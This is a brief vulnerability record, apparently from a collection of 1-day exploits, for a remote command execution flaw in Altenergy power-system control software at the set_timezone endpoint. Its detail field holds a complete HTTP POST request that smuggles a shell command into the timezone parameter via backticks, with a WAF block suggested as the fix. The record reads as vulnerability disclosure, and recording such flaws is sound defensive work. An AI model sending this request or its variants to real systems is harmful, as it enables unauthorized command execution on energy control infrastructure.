vendor = "Altenergy"
name = "Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞"
type = "RCE"
version = "未知"
path = "/index.php/management/set_timezone"
detail = "POST /index.php/management/set_timezone HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 timezone=`id > rce.txt`"
fix = "WAF封禁路路径，等待发布补丁"
date = "0823"
label = "1day"
